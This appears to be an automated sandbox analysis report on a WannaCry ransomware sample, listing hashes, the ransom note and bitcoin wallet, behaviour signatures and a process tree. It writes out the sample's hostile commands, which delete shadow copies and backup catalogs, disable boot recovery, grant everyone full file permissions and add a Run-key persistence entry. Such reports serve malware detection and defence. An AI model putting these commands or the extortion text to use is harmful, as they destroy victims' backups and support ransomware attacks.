Analysis
-
max time kernel
146s -
resource
win10v191014 -
submitted
30-12-2019 13:54
Task
task1
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7v191014
0 signatures
Task
task2
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10v191014
0 signatures
General
-
Target
test.zip
-
Sample
191230-wtyfvq9dga
-
SHA256
72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4984 icacls.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4060 @[email protected] 4196 @[email protected] 2472 @[email protected] 1016 @[email protected] 2512 @[email protected] 3592 @[email protected] -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4976 taskhsvc.exe -
Adds Run entry to start application 2 TTPs 1 IoCs
description ioc Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nmsqcsinudawe237 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeTcbPrivilege 2548 taskse.exe Token: SeBackupPrivilege 4864 vssvc.exe Token: SeRestorePrivilege 4864 vssvc.exe Token: SeAuditPrivilege 4864 vssvc.exe Token: SeIncreaseQuotaPrivilege 592 WMIC.exe Token: SeSecurityPrivilege 592 WMIC.exe Token: SeTakeOwnershipPrivilege 592 WMIC.exe Token: SeLoadDriverPrivilege 592 WMIC.exe Token: SeSystemProfilePrivilege 592 WMIC.exe Token: SeSystemtimePrivilege 592 WMIC.exe Token: SeProfSingleProcessPrivilege 592 WMIC.exe Token: SeIncBasePriorityPrivilege 592 WMIC.exe Token: SeCreatePagefilePrivilege 592 WMIC.exe Token: SeBackupPrivilege 592 WMIC.exe Token: SeRestorePrivilege 592 WMIC.exe Token: SeShutdownPrivilege 592 WMIC.exe Token: SeDebugPrivilege 592 WMIC.exe Token: SeSystemEnvironmentPrivilege 592 WMIC.exe Token: SeRemoteShutdownPrivilege 592 WMIC.exe Token: SeUndockPrivilege 592 WMIC.exe Token: SeManageVolumePrivilege 592 WMIC.exe Token: 33 592 WMIC.exe Token: 34 592 WMIC.exe Token: 35 592 WMIC.exe Token: 36 592 WMIC.exe Token: SeTcbPrivilege 288 taskse.exe Token: SeTcbPrivilege 2504 taskse.exe Token: SeTcbPrivilege 3544 taskse.exe -
Loads dropped DLL 1 IoCs
pid Process 4976 taskhsvc.exe -
Deletes shadow copies 2 TTPs 2 IoCs
pid Process 3996 vssadmin.exe 592 WMIC.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4952 attrib.exe -
Drops startup file 6 IoCs
description ioc Process File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB4AC.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB4AC.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB4AC.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB4B3.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB4B3.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB4B3.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4816 reg.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 4928 wrote to memory of 4952 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 72 PID 4928 wrote to memory of 4984 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 75 PID 4928 wrote to memory of 988 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 77 PID 4928 wrote to memory of 3032 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 79 PID 3032 wrote to memory of 3720 3032 cmd.exe 81 PID 4928 wrote to memory of 4060 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 87 PID 4928 wrote to memory of 4084 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 88 PID 4084 wrote to memory of 4196 4084 cmd.exe 90 PID 4928 wrote to memory of 2548 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 92 PID 4928 wrote to memory of 2472 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 93 PID 4928 wrote to memory of 2364 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 94 PID 4928 wrote to memory of 4856 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 96 PID 2364 wrote to memory of 4816 2364 cmd.exe 97 PID 4060 wrote to memory of 4976 4060 @[email protected] 99 PID 4196 wrote to memory of 4208 4196 @[email protected] 102 PID 4208 wrote to memory of 3996 4208 cmd.exe 104 PID 4208 wrote to memory of 592 4208 cmd.exe 106 PID 4928 wrote to memory of 4908 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 108 PID 4928 wrote to memory of 288 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 109 PID 4928 wrote to memory of 1016 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 110 PID 4928 wrote to memory of 2172 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 114 PID 4928 wrote to memory of 2504 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 115 PID 4928 wrote to memory of 2512 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 116 PID 4928 wrote to memory of 3544 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 122 PID 4928 wrote to memory of 3592 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 123 PID 4928 wrote to memory of 4512 4928 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 124 -
Executes dropped EXE 16 IoCs
pid Process 988 taskdl.exe 4060 @[email protected] 4196 @[email protected] 2548 taskse.exe 2472 @[email protected] 4856 taskdl.exe 4976 taskhsvc.exe 4908 taskdl.exe 288 taskse.exe 1016 @[email protected] 2172 taskdl.exe 2504 taskse.exe 2512 @[email protected] 3544 taskse.exe 3592 @[email protected] 4512 taskdl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:4952
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4984
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 85281577717710.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:3720
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Executes dropped EXE
PID:4976
-
-
-
C:\Windows\SysWOW64\cmd.exePID:4084
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4196 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Deletes shadow copies
PID:3996
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
- Deletes shadow copies
PID:592
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:2472
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Modifies registry key
PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4856
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4908
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:288
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1016
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:3544
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4512
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864